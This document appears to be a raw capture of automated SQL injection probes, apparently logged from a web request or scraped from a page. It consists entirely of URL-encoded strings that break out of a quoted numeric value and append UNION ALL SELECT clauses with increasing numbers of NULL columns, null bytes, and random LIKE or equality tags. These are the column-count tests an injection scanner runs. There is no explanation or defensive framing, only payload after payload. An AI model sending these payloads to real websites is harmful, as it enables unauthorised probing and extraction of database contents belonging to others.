1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27SUDr%27%20LIKE%20%27SUDr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27QWAH%27%20LIKE%20%27QWAH 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27WxBy%27%20LIKE%20%27WxBy 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27AOQM%27%20LIKE%20%27AOQM 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27JJep%27%20LIKE%20%27JJep 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27qFdC%27%20LIKE%20%27qFdC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27WEiC%27%20LIKE%20%27WEiC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27enQI%27%20LIKE%20%27enQI 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27AyuO%27%20LIKE%20%27AyuO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dAml%27%20LIKE%20%27dAml 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27dMzb%27%20LIKE%20%27dMzb 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27OyKO%27%20LIKE%20%27OyKO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27hzVB%27%20LIKE%20%27hzVB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27pKEi%27%20LIKE%20%27pKEi 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27evTM%27%20LIKE%20%27evTM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27CaeE%27%20LIKE%20%27CaeE 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27qHLh%27%20LIKE%20%27qHLh 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Vgze%27%20LIKE%20%27Vgze 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27LaNy%27%20LIKE%20%27LaNy 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27kAdZ%27%20LIKE%20%27kAdZ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27xoZL%27%20LIKE%20%27xoZL 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ZPIa%27%20LIKE%20%27ZPIa 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27SilV%27%20LIKE%20%27SilV 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27eJEp%27%20LIKE%20%27eJEp 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27BXXu%27%20LIKE%20%27BXXu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22rwnl%22%3D%22rwnl 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22LsYj%22%3D%22LsYj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22eIyF%22%3D%22eIyF 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22tEFG%22%3D%22tEFG 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22aHRY%22%3D%22aHRY 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22DCFV%22%3D%22DCFV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22bCKj%22%3D%22bCKj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22fuYn%22%3D%22fuYn 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Yodp%22%3D%22Yodp 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22nBMi%22%3D%22nBMi 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22DDGv%22%3D%22DDGv 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22VWDO%22%3D%22VWDO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22wDgj%22%3D%22wDgj 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22LTdM%22%3D%22LTdM 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22KEMs%22%3D%22KEMs 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22AfKY%22%3D%22AfKY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22vrFb%22%3D%22vrFb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22nZWs%22%3D%22nZWs 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22dSjw%22%3D%22dSjw 